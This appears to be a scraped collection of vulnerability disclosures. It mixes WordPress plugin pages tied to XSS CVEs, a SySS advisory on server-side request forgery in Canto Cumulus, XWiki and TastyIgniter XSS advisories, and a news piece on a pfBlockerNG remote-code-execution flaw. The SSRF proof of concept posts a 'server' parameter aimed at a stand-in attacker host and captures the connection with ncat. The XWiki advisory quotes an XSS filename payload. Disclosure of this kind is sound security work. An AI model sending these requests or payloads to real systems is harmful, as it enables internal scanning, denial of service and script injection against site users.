Authenticated (subscriber+) Stored Cross-Site Scripting (XSS) vulnerability in Ali Khallad's Contact Form By Mega Forms plugin <= 1.2.4 at WordPress.

*   Details
*   Reviews
*   Support
*   Development

Mega Forms is highly advanced contact form builder for WordPress, it comes with all the contact form features you will ever need, including AJAX submission, multi-page contact forms, secure file uploads, conditional logic, save and continue, and tons more. You can use Mega Forms to save time, grow customer interaction, and build better contact forms for any purpose.

Mega Forms gives you a modern interface, easy customization, and the ability to build modern & professional forms thanks to our intuitive drag & drop visual editor.

Now you can create better forms, embed them anywhere on your WordPress website, get email notification for each submission, perform custom tasks, and collect & manage data without being a coding ninja.

Mega Forms contact forms are also highly optimized for web and server performance. We know how important speed is when it comes to SEO and user experience, that’s why we have built every piece of Mega Forms with performance and usability in mind. Mega Forms will load the least possible amount of CSS & JS assets, and only store necessary data to the database to keep your website fast and provide your users with better experience.

**No Coding Skills Required**

No technical skill? No problem. You can easily design simple and complex forms with our highly advanced visual builder. Mega Forms offers a flexible row/column layout system that requires very minimal effort to build forms that blends nicely with your website design.

**Developer Friendly**

Mega Forms has been built with developers in mind. This means it’s flexible, easily extendable, and full of action and filter hooks, making it easy to customize to your own needs.

**Top Features**

Mega Forms comes with a visual editor and ton of other features:

*   Intuitive user interface
*   Drag & drop form builder
*   Optimized for speed & performance
*   Tons of free field types ( text, select, radio, checkboxes and more )
*   Regular updates & dedicated support
*   Fully responsive & mobile friendly
*   Unlimited forms & form submission
*   Merge tags support
*   Multi-steps support
*   Conditional logic support
*   Export and import forms
*   Customizable templates
*   Full control ( styles, email templates, field templates and more )
*   Developer friendly
*   Highly effective Anti-spam system ( invisible to users )

**Does Mega Forms Have A Getting Started Guide**

We’re currently still working on building Mega Forms site, once completed, it will have a complete list of resources at https://wpmegaforms.com/

**Is There A Documentation For Developers**

We’re currently still working on building Mega Forms site, once completed, it will have a complete list of resources at https://wpmegaforms.com/

**Does It Work On All Devices**

Yes, Mega Forms is completely responsive and will display forms properly on all types of devices.

**Does It Include Spam Protection**

Yes, we are using a combination of Honeypot & Timetrap to make great spambot-proof forms. We have implemented these thwarting techniques in a way that makes them very effective in detecting and blocking spam submissions without annoying the real users.

**Can I Export & Import Forms**

Yes, you can easily export and import forms via the dedicated export/import tool in the admin area.

**What Field Types Does Mega Forms Offer**

Mega Forms comes with all the fields you need:

*   Text Field
*   Paragraph Text (Textarea)
*   Dropdown Field
*   Radio Buttons
*   Checkboxes
*   Number
*   Name
*   Email Address
*   Address
*   Phone
*   Password
*   Date
*   Website
*   Hidden
*   HTML ( HTML code )
*   Divider
*   Question
*   File Upload
*   Consent

Here is a list of the field types in progress:

*   Google ReCaptacha
*   Calculated Field
*   Star Rating
*   Rangle Slider
*   Toggle
*   Signature
*   Pricing ( field group )

Here is a list of the field containers in progress:

*   Repeatable Group
*   Tabs
*   Accordions

**What Actions Does Mega Forms Offer**

Mega Forms comes with the necessary actions by default:

*   Email Notification
*   WordPress Hook

Here is a list of actions in progress:

*   Google Spreadsheet
*   Integrations ( MailChimp, ActiveCampaign, ConvertKit, AWeber, Campaign Monitor…etc )
*   Webhooks
*   Front End Posting
*   Register User

**Is It Translation Ready**

Yes, Mega Forms has full translation and localization support via the ‘megaforms’ textdomain.

**What Features Are Coming Next**

We are in the process of building more features, here is a list:

*   Form Chaining
*   Export Entries into CSV
*   Tons Of Integrations
*   Payments
*   PDF Copy
*   Save And Continue Later
*   Advanced Stats

We don’t promise all of this will be available soon, but we promise we’ll do our best to ship these features as soon as we can.

Mega Forms is a great drag n drop contact form builder. It supports all form fields you need and has a multi-page form option.

This is a very useful plugin for creating simple forms in WordPress. It saves entries in DB which can be very useful. Form builder is simple with easy to understand UI. I hope it will get more features. Ability to export entries in .xlsx and .pdf would be great.

Simple and perfect plugin to create your form

Congratulations, I'm very happy to be the second one to publish a review for this great plugin.

I think it is a useful Plugin and We wait for more Featuresز Due to the WordPress Hook, I think it is good to explain it in your Plugin Page or URL to let the Users Know how to use it.. Best regards

Read all 5 reviews

“Contact Form By Mega Forms – Drag and Drop Form Builder” is open source software. The following people have contributed to this plugin.

Contributors

*    Ali Khallad

**1.0.0**

*   First release

**1.0.1**

*   Fixed bug ( error when saving forms without adding actions )

**1.0.2**

*   Fixed bugs ( Form editior not taking full screen size, admin area styling fixes..etc )
*   Added “Section” field
*   Added “Question” field ( mainly added to help with Spam prevention )
*   Added the possibility to make “Divider” field transparent ( maily to be used as a “spacer” when needed )
*   Corrected some spelling mistakes

**1.0.3**

*   Fixed bugs
*   Added option to disable saving entries on form submission ( usefull for updating user info..etc )
*   Implemented Anti-spam technique ( Honeypot trap )
*   Added shortcode processing feature to the HTML field

**1.0.4**

*   Fixed bugs ( honeypot issues, php errors on empty form submission, choices not saving in order after moving them around…etc )
*   Added Anti-spam technique ( timetrap )

**1.0.5**

*   Fixed bugs
*   Added pre-made forms feature ( you can now create form based on pre-made templates )

**1.0.6**

*   Fixed bugs ( Styling issues, repeated name attributes when using multiple forms on same page )
*   Improvements to the overall user experience
*   Improvements to the form editor design to allow more clarity while building and managing forms
*   Added more flexibility for developers to create fields, field options..etc
*   Added AJAX submission support
*   Added conditional logic

**1.0.7**

*   Improved: order and display of options in the edit field tab ( Form editor )
*   Fixed: duplicate field setting tabs not responding ( Form editor )
*   Fixed: AJAX form doesn’t respond after first submission
*   Fixed: “Maximum call stack size exceeded” JS error when deep conditional logic is implemented
*   Added: multi-step feature ( paged forms )
*   Added: file upload field

**1.0.8**

*   Styling fixes
*   form editor preview fixes ( wrong column width + wrong description position when typed the first time )
*   Fixed: form shortcode was returning as an empty string when called via AJAX
*   Fixed: AJAX validation was adding duplicate notices for choice fields (radios, checkboxes)
*   Fixed: bug in mfget_option function that mixes between false and non-existing setting values causing some of the true/false settings to have unexpected behavior
*   Added: Save and continue feature
*   Added: Consent field

**1.0.9**

*   Extended “One line text” and “Paragraph text” fields so that the user can view number of characters typed if the maximum length is set for these fields.
*   Added the ability to control field label visibility (show/hide)
*   Fixed bug: When duplicating a field in the form editor, the field values were not copied over to the new field
*   Fixed bug: When adding field tag in the form editor, the field preview didn’t update with the new field value because the change event is not triggered for that field

**1.1.0**

*   Fixed: emails were not being sent when there are multiple recipients

**1.1.1**

*   Performance optimization ( combined and minifed CSS & JS resources )
*   Improved conditional logic

**1.1.2**

*   Fix: a JS bug that prevents items from displaying in the single entry page
*   Fix: email header issues
*   Fix: conditional logic not working on compound fields
*   Improvement: Make phone & number fields display a keypad on mobile view instead of the default keyboard.

**1.1.3**

*   Update: include all PRO features in free version and drop the paid version ( Mega Forms with all PRO features is now free ).
*   Fix: a bug in the referrer column in entries table that prevents the creation of entries if the referrer is longer than 100 chars.

**1.1.4**

*   added filter hook “mf\_bypass\_session\_error” to allow bypassing session validation error ( usefull when cookies aren’t allowed/saved ).

**1.1.5**

*   Fix: form email action issues ( subject was empty by default, email not sending when the “from” field is not formatted correctly )
*   Fix: entries list display ( the list was showing all columns/fields by default which can cause unpleasant view for large forms)
*   Fix: fields order was based on ID order on different areas ( emails, entries, entry lists..etc ), this is corrected to show fields in the same order as they appear on the form.
*   Improved the “Change columns visibility” option design/display on the entries list page
*   Ensure that once an entry is deleted, all associated files will be deleted as well.
*   Added a link to download/view uploaded files in email notifications

**1.1.6**

*   Fix: bug in file field description ( removing file field description was not possible )
*   Added WordPress shortcodes support to the “default value” field
*   Fix: syntax error during activation

**1.1.7**

*   Added cookies compatibility with wpengine ( to prevent caching issues )
*   Fixed a bug with WP admin notices ( hiding notices outside the plugin’s pages )
*   Fixed a bug with the plugin’s admin snackbar ( not being loaded on some pages )

**1.1.8**

*   Bug fixes in the drag and drop uploads field ( inaccurate file count … )

**1.1.9**

*   Fix: a bug in “more options” selection in email action that only allows a single value to be saved
*   Fix: a bug making the filetype case-sensitive in upload field

**1.2.0**

*   Fix: a bug in checkbox option that is causing only the last selected value to be saved from a checkbox list in AJAX submissions
*   Fix: a bug in “form save” process that is causing only a single “form action” to be saved.

**1.2.1**

*   Fix: maintain the selected tab selected after page refresh ( admin settings )
*   Added: ability to export form entries

**1.2.2**

*   Changed Mega Forms session cookie prefix from “mf” to “wordpress\_mf” to ensure compatibility with caching plugins and hosting providers caching.
*   Fixed: CSS clearfix incompatibility with some theme which causing the layout of some fields to break ( eg; address field when error are displayed )
*   Fixed: Bug that prevented the “CSS Classes” value from being saved for form fields.

**1.2.3**

*   Styling fixes
*   Reduced resources ( CSS, JS ) size.

**1.2.4**

*   Add support to multisite

**1.2.5**

*   CSS Fixes
*   Fixed a XSS issue. Credit: ptsfence.

CVE-2022-40191: Contact Form By Mega Forms – Drag and Drop Form Builder

Authenticated (admin+) Stored Cross-Site Scripting (XSS) vulnerability in Apasionados Export Post Info plugin <= 1.1.0 at WordPress.

*   Details
*   Reviews
*   Installation
*   Support
*   Development

**Description**

This plugin exports posts Date published, Post title, Word Count, Status, URL and Category to a CSV file, allowing to have an overview of the topics and titles published in the blog.

We created this plugin because we generate large amounts of content for blogs and we often need to lookup the topics that were already covered before in a blog. As we don’t want to export the titles by hand we developed this plugin.

**What can I do with this plugin?**

This plugin exports posts Date published, Post title, Word Count, Status, URL and Category to a CSV file that can be imported into Excel.

**What ideas is this plugin based on?**

We were searching for a plugin that allowed us to export the post titles and found Export All URLs. Unfortunately the plugin didn’t export the publish date, status and word count, so we decided to create a new plugin with this information and the the ability to translate it.

**System requirements**

PHP version 5.5 or greater.

**Export Post Info to CSV Plugin in your Language!**

This first release is avaliable in English and Spanish. In the “languages” folder we have included the necessarry files to translate this plugin.

If you would like the plugin in your language and you’re good at translating, please drop us a line at Contact us.

**Further Reading**

You can access the description of the plugin in Spanish at: Export Post Info to CSV en español.

**Contact**

For further information please send us an email.

**Translating WordPress Plugins**

The steps involved in translating a plugin are:

1.  Run a tool over the code to produce a POT file (Portable Object Template), simply a list of all localizable text. Our plugins allready havae this POT file in the /languages/ folder.
2.  Use a plain text editor or a special localization tool to generate a translation for each piece of text. This produces a PO file (Portable Object). The only difference between a POT and PO file is that the PO file contains translations.
3.  Compile the PO file to produce a MO file (Machine Object), which can then be used in the theme or plugin.

In order to translate a plugin you will need a special software tool like poEdit, which is a cross-platform graphical tool that is available for Windows, Linux, and Mac OS X.

The naming of your PO and MO files is very important and must match the desired locale. The naming convention is: language_COUNTRY.po and plugins have an additional naming convention whereby the plugin name is added to the filename: pluginname-fr_FR.po

That is, the plugin name name must be the language code followed by an underscore, followed by a code for the country (in uppercase). If the encoding of the file is not UTF-8 then the encoding must be specified.

For example:

*   en\_US � US English
*   en\_UK � UK English
*   es\_ES � Spanish from Spain
*   fr\_FR � French from France
*   zh\_CN � Simplified Chinese

A list of language codes can be found here, and country codes can be found here. A full list of encoding names can also be found at IANA.

**Screenshots**

**Installation**

1.  First you will have to upload the plugin to the /wp-content/plugins/ folder.
2.  Then activate the plugin in the plugin panel.
3.  Go to SETTINGS / EXPORT POST INFO.
4.  Save a random string to make it harder for somebody to access your exported data.
5.  Download your CSV file.

**FAQ**

**Why did you make this plugin?**

We couldn’t find a plugin that would give us the functionality we were looking for:  
1) Export publish date.  
2) Export word count.  
3) Easy translation of the plugin into other languages. So far English and Spanish translations are included.

**Why do I have to setup a random string for the name of the export CSV file?**

Other plugins always export the file with the same name and in the same folder so it’s easy to access this file. We don’t want that this file can be easily found, so we decided to let you setup a random string to make the file name harder to guess.

**Does Export Post Info make changes to the database?**

Yes. It created an entry in the options table where the random string is stored.

**How can I check out if the plugin works for me?**

Install and activate. Go to settings / Export Post Info. Save random string. And download CSV file.

**How can I remove Export Post Info to CSV?**

You can simply activate, deactivate or delete it in your plugin management section.

**Which PHP version do I need?**

This plugin has been tested and works with PHP versions 5.5 and greater. WordPress itself recommends using PHP version 7.3 or greater. If you’re using a PHP version lower than 5.5 please upgrade your PHP version or contact your Server administrator.

**Are there any known incompatibilities?**

Yes. On a multi-language site the export will not work correctly.

**Is this plugin compatible with WPML**

Yes, but only the posts of the main language are exported. Post in secondary languages are not exported at this moment. We are working on this because we would like to have this feature but for us it isn’t easy to code.

**Are there any server requirements?**

Yes. The plugin requires a PHP version 5.5 or higher and we recommend using PHP version 7.3 or higher.

**Do you make use of Export Post Info to CSV yourself?**

Of course we do. That’s why we created it. 😉

**Reviews**

From uploading the plugin to downloading the CSV file took about 15 seconds! Just perfect - thank you!

This plugin exported exactly what I needed, and it did it quickly and painlessly. Thanks very much to the devs!

Time saver, works just fine

Super plugin, très simple à utiliser. Merci !

Thank you so much for this amazing little plugin that did exactly what I needed. Saved me hours of work in creating a spreadsheet with all my posts so I can create an optimization checklist. The other popular export all posts plugin only exports the post title, url and category. Without the date and other fields, I would have to go in and manually add that data. Export Post Info (this plugin) did all of it perfectly. Keep up the great work!

October 11, 2018

Not sure why this plug in has no reviews. Did for me EXACTLY what I needed even though it is two years old. Muchas Gracias

Read all 6 reviews

**Contributors & Developers**

“Export Post Info” is open source software. The following people have contributed to this plugin.

Contributors

*    apasionados

**Changelog****1.2.0 (06/Sep/2022)**

*   Security update: Please update your plugin. We escaped data to increase your security.
*   Corrected PHP notices when debug was active.

**1.1.0 (25/Aug/2019)**

*   Now posts with status published, future and private are exported. Until now only posts with status published were exported.
*   Added post status column to the export file.
*   PHP version must be 5.6 or higher. Recommended PHP version: 7.3.

**1.0.4 (08/Abr/2017)**

*   Cleaned up code + Changed functions name to be unique and avoid conflicts with other plugins or themes.

**1.0.3 (07/Abr/2017)**

*   Added check for PHP version when activating the plugin. PHP version must be 5.5 o greater.

**1.0.2 (07/Abr/2017)**

*   Solved error in Word Count with words containing UTF-8 characters.

**1.0.1 (07/Abr/2017)**

*   Word count would not count all words of a post if a tag was present.

**1.0.0 (07/Abr/2017)**

*   First official release.

CVE-2022-38068: Export Post Info

Authenticated (shop manager+) Reflected Cross-Site Scripting (XSS) vulnerability in AlgolPlus Advanced Order Export For WooCommerce plugin <= 3.3.1 at WordPress.

CVE-2022-35275

Authenticated (admin+) Stored Cross-Site Scripting (XSS) vulnerability in Hans Matzen's wp-forecast plugin <= 7.5 at WordPress.

CVE-2022-35725

Authenticated (admin+) Stored Cross-Site Scripting (XSS) vulnerability in Liam Gladdy / Thirty8 Digital Culture Object plugin <= 4.0.1 at WordPress.

CVE-2022-36356

Cross-site Scripting (XSS) - Stored in GitHub repository appwrite/appwrite prior to 1.0.0-RC1.

CVE-2022-2925

A Server-Side Request Forgery issue in Canto Cumulus through 11.1.3 allows attackers to enumerate the internal network, overload network resources, and possibly have unspecified other impact via the server parameter to the /cwc/login login form.

\-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 Advisory ID: SYSS-2022-023 Product: Canto Cumulus Manufacturer: Canto Inc. Affected Version(s): Through 11.1.3 Tested Version(s): 11.1.3 (Build 26f5823e) Vulnerability Type: Server-Side Request Forgery (CWE-918) Risk Level: High Solution Status: Mitigation possible Manufacturer Notification: 2022-03-25 Solution Date: No solution Public Disclosure: 2022-06-01 CVE Reference: Not yet assigned Author of Advisory: Thibaud Kehler, SySS GmbH ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Overview: Canto Cumulus is a digital asset management (DAM).\[1\] Due to missing validation of untrusted input, the Cumulus web server is vulnerable to server-side request forgery (SSRF) with an unknown proprietary protocol. This behavior poses a risk for denial-of-service (DoS) attacks, impersonation attacks and attacks on the protocol with the theoretical result of remote code execution (RCE) or authentication bypass. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Vulnerability Details: When logging in to the web server via the form at the URL https://hostname.example/cwc/login, a hidden URL parameter 'server' is sent to the server in the respective HTTP POST request to https://hostname.example/cwc/catalog. Afterwards, the web server establishes a TCP connection to the system specified in that request via an unknown protocol. This yields the following problems: \* Denial of service: The web server keeps the TCP connection open for around 60 seconds. This could be misused to fill limited resources on the server or the server's infrastructure, e.g. NAT tables or connection pools, resulting in a DoS. \* Internal port scan: The web server would respond differently if it was able to establish a connection to the specified TCP port. An attacker could use this behavior to conduct a port scan on the internal network. \* Authentication bypass (theoretical): As the server is specified during authentication, it might be possible that the server-side request is used to verify the credentials given to the login form. An attacker could pretend to be an authentication server and forge a successful login or elevated privileges to the web application. \* Protocol attacks (theoretical): The server-side request uses an unknown binary protocol. An attacker might launch further attacks on that protocol, e.g. buffer overflow or deserialization attacks. In the worst case, if the server implementation of the protocol is vulnerable to such attacks, this will result in RCE on the server. SySS recommends restricting web server-side requests to a limited set of trusted servers. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Proof of Concept (PoC): An attacker can specify an arbitrary IP address / hostname and port, as depicted in the following HTTP POST request: POST /cwc/catalog HTTP/1.1 Host: hostname.example User-Agent: Mozilla/5.0 (X11; Linux x86\_64; rv:98.0) Gecko/20100101 Firefox/98.0 Content-Type: application/x-www-form-urlencoded Content-Length: 123 OWASP\_CSRFTOKEN=V1UT-I5A9-QIYJ-HG0C-A1UZ-8Z06-VQ6I-Q6CM&user=guest&password=guest&encmpoding=UTF-8&server=server.attacker:80 During the response, the web server connects to the specified TCP port on the specified host via an unknown proprietary protocol: # ncat -nlvp 80 | hexdump -C Ncat: Version 7.92 ( https://nmap.org/ncat ) Ncat: Listening on :::80 Ncat: Listening on 0.0.0.0:80 Ncat: Connection from \[WAN IP\]. Ncat: Connection from \[WAN IP\]:10402. 00000000 00 00 00 28 72 65 63 6f 00 00 00 02 00 00 00 04 |...(reco........| 00000010 63 4d 49 44 4c 6f 6e 67 73 69 52 51 00 00 00 04 |cMIDLongsiRQ....| 00000020 53 65 72 23 4c 6f 6e 67 00 04 77 7b 00 00 00 18 |Ser#Long..w{....| 00000030 72 65 63 6f 00 00 00 01 00 00 00 04 63 4d 49 44 |reco........cMID| 00000040 4c 6f 6e 67 51 75 69 74 |LongQuit| 00000048 If the specified host responds in an unexpected way, the web server closes the server-side connection and responds to the initial HTTP request with HTTP error code 302 and a redirection to an error page: HTTP/1.1 302 Server: nginx Date: Wed, 23 Mar 2022 16:31:43 GMT Content-Type: text/json;charset=utf-8 Content-Length: 0 Connection: keep-alive Set-Cookie: JSESSIONID=02505EB227E875FFAC9CB283AF8F16CB; Path=/cwc; Secure; HttpOnly X-Frame-Options: SAMEORIGIN Strict-Transport-Security: max-age=16070400 X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block Location: /cwc/error.jspx?errorID=CumulusError&errorTitle=Cumulus+error&errorTitle=Cumulus+error&errorMessage=An+error+occured.&disableButtonDashboard=true If the DNS name cannot be resolved or if the specified TCP port is unreachable, the server responds with HTTP error code 500 and renders the login form with HTML containing an additional error message which states that the server could not be reached. This differing behavior enables the internal port scan. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Solution: The manufacturer has not released a patch and will not address the vulnerability. The manufacturer recommends securing the Cumulus server by using a firewall. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclosure Timeline: 2022-03-18: Vulnerability discovered 2022-03-25: Vulnerability reported to the manufacturer 2022-05-11: Manufacturer informed SySS that it will not address the vulnerability 2022-06-01: Public disclosure of the vulnerability ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ References: \[1\] Product website for Canto Cumulus https://www.canto.com/de/cumulus/ \[2\] SySS Security Advisory SYSS-2022-023 (not yet published) https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2022-023.txt \[3\] SySS Responsible Disclosure Policy https://www.syss.de/en/responsible-disclosure-policy ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Credits: This security vulnerability was found by Thibaud Kehler of SySS GmbH. E-Mail: thibaud.kehler@syss.de Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Thibaud\_Kehler.asc Key ID: 0xB645 7D7A Key Fingerprint: CF29 54F1 1B7F 2FF5 7ED9 9BAD E9C7 9866 B645 7D7A ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclaimer: The information provided in this security advisory is provided "as is" and without warranty of any kind. Details of this security advisory may be updated in order to provide as accurate information as possible. The latest version of this security advisory is available on the SySS website. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Copyright: Creative Commons - Attribution (by) - Version 3.0 URL: http://creativecommons.org/licenses/by/3.0/deed.en -----BEGIN PGP SIGNATURE----- iQIzBAEBCgAdFiEEzylU8Rt/L/V+2Zut6ceYZrZFfXoFAmKWCXIACgkQ6ceYZrZF fXqI7A//ZiwtJccj1fcb1EcVK1l4jHU3ZXcJrcYFib4jqzYgZ+NQXA1OVFmJ8P9a MaK9/9GCTjRUnHL0zJfv2Q18GwDaFcq3Ecv61l0IttgOwPmZk3bdGhbiZbuNkid9 n8WBCtzMoPYb8b8BvGDmbjhGcIWfLBJ4hf9nspeIP12MtYNe0qwYXQJsDrZwmUgu bqD5AnXItyYSDe690LRweAh5vAtdvtp+7SQLOPfi49QyG9sxb9jw1qsK8KVZNutt nIwSD5SFrCCgVvEn6E02FHGW7ttEivxSPTN60FsoGhhCD7V1zeu2teNaZvarETek cnSuYgNNBCdPhCm6WDDMgw5vNOUqg0UE1CqZjZ84DBOu4ABBMF4PV9JBFYbOeWTK XYmVsREJVFnvF+qmXDVfEoByaKsXX1yIZkJwGYFXGS3bvFpaipMGLbRFzc49abPI sv5Vth94AmnTyHsG73tM93d3y5BRLpwxwuRSmG5PRzbuZet8ThPH4Hoc1OAysNTa zsCm3VkSemX0Ba8z6mL4IwuknYoetuKQli37jAx7jGsfetFc9tKvHsk3dQ9w+wQG 040DaLa8NsBh+b1PeQZj6AVC+qH6OgGADl5l0Dnh3VcQW3eWUV0YgQofgOsbili6 6CGZNJwE8HkWX5U4HuTaF/A3b8BaFd0IailYTDGc3SaLz4XOAyU= =FDje -----END PGP SIGNATURE-----

CVE-2022-40305

XWiki Platform Web Parent POM contains Web resources for the XWiki platform, a generic wiki platform. Starting with version 1.0 and prior to versions 13.10.6 and 14.30-rc-1, it's possible to store JavaScript which will be executed by anyone viewing the history of an attachment containing javascript in its name. This issue has been patched in XWiki 13.10.6 and 14.3RC1. As a workaround, it is possible to replace `viewattachrev.vm`, the entry point for this attack, by a patched version from the patch without updating XWiki.

**Impact**

It's possible to store a JavaScript which will be executed by anyone viewing the history of an attachment containing javascript in its name.

For example, attachment a file with name ><img src=1 onerror=alert(1)>.jpg will execute the alert.

**Patches**

This issue has been patched in XWiki 13.10.6 and 14.3RC1.

**Workarounds**

It is possible to replace viewattachrev.vm, the entry point for this attack, by a patched version from the patch without updating XWiki.

**References**

*   https://jira.xwiki.org/browse/XWIKI-19612

**For more information**

If you have any questions or comments about this advisory:

*   Open an issue in Jira XWiki.org
*   Email us at Security Mailing List

CVE-2022-36094: XSS in the attachment history

TastyIgniter v3.5.0 was discovered to contain a cross-site scripting (XSS) vulnerability which allows attackers to execute arbitrary web scripts or HTML via a crafted payload.

Vendor

Product

TastyIgniter

Affected Version(s)

3.5.0 and probably prior

Tested Version(s)

3.5.0

Vendor Notification

13 June 2022

Advisory Publication

13 June 2022 \[without technical details\]

Vendor Fix

N/A

Public Disclosure

13 June 2022

Latest Modification

09 June 2022

CVE Identifier

Pending

Product Description

A free online ordering system for restaurants & takeaways based on Laravel PHP Framework.

Credits

Oswaldo Morales Rodríguez Security Researcher & Penetration Tester @wizlynx group

**Stored XSS**

**Severity**: **Medium**

**CVSS Score**: 5.4

**CWE-ID**: CWE-79

**Status**: Open

**Vulnerability Description**

TastyIgniter is affected by Stored Cross-Site Scripting (XSS) vulnerability affecting version 3.5.0. An attacker can use the vulnerability to inject malicious JavaScript code into the application, which will execute within the browser of any user who views the relevant application content. The attacker-supplied code can perform a wide variety of actions, such as stealing victims' session tokens or login credentials, performing arbitrary actions on their behalf, and logging their keystrokes.

**CVSS Base Score**

**Attack Vector**

Network

**Scope**

Changed

**Attack Complexity**

Low

**Confidentiality Impact**

Low

**Privileges Required**

Low

**Integrity Impact**

Low

**User Interaction**

Required

**Availability Impact**

None

Full details about the vulnerability will be disclosed once the vendor has provided a patch.

Top

CVE-2022-38256: wizlynx group | Stored Cross-Site Scripting (XSS) Vulnerability in TastyIgniter v3.5.0

pfSense and sensibility

Security researchers from IHTeam have uncovered a serious vulnerability in a plugin to the pfSense firewall technology.

The affected pfBlockerNG plugin is not installed by default and the problem was, in any case, resolved by a software update published in June.

This is just as well because the underlying flaw created an unauthenticated remote code execution (RCE) as root risk on affected installations, according to IHTeam. The pfSense pfBlockerNG vulnerability is tracked as CVE-2022-31814.

**Root cause analysis**

pfSense is a firewall/router software distribution based on FreeBSD. The open source\-based network firewall technology can be installed on bare metal or as a virtual appliance.

pfBlockerNG is a plugin component available within pfSense that will facilitate allow-listing or deny-listing of entire IP ranges. It is often used to block entire countries from communicating with networks running pfSense, according to researchers, who point out several factors that call particular attention to the problem.

“The vulnerability is a remote command execution exploitable from an unauthenticated perspective and, on top of that, the web server is running with root privileges,” a representation of IHTeam told The Daily Swig.

Read more of the latest network security news

Importantly, the vulnerability is limited to a plugin of pfSense that is not installed by default.

“It is difficult to say how many systems are affected without actively crawling each of the exposed system,” according to IHTeam.

Accordingly to Shodan, there are around 27,000 exposed pfSense machines on the internet. This should not be taken as any indication of the number of vulnerable systems since many will not be running the affected pfBlockerNG plugin, without considering that even vulnerable installations have likely been patched since the software was updated.

In response to a query from The Daily Swig, the developer of pfBlockerNG said: “The only version that was affected is version 2.1.4\_26 and below. This has been patched and can be upgraded in pkg manager. pfBlockerNG-devel is unaffected and is the recommended version to use.”

**Practical impact**

Netgate, which distributes the pfSense firewall, added in response to a related query: “The problem they \[the researchers\] found was in the pfBlockerNG package but had already been addressed in the pfBlockerNG-devel \[latest, cutting edge version of the\] package, which is the version the package maintainer recommends everyone use.”

Netgate stated that for the problem to become exposed “requires access to the web server on the firewall (which should never be open on WAN and is often restricted internally when configured per best practices), the overall practical impact was considered extremely low despite it having a high score in theory.”

IHTeam said that developers are still shipping and allowing users to install between the 2.x branch and the 3.x branch (the -development one).

“The misunderstanding can be easily resolved it they would simply remove the 2.x branch from the available plugin list,” the researchers added.

IHTeam came across the vulnerability in pfBlockerNG during an independent security assessment of what turned out to be a vulnerable version of the product. A technical write-up of the issue was published in a blog post by IHTeam on Monday (September 5).

**Dev lessons**

A researcher from IHTeam, who asked not to be named, told The Daily Swig that the characteristics of the bug offered lessons for other software developers.

The researcher explained: “To avoid these types of vulnerabilities, developers should take extra care while handling user input (not only via direct and requests, but also via input that might be passed in request headers such as , or ).

“All user input should be carefully analysed and sanitised before being passed to the application. This is also valid for other types of attacks such as cross-site scripting (XSS) or SQL injection, not only for command execution,” they added.

RELATED WatchGuard firewall exploit threatens appliance takeover

Tag

#xss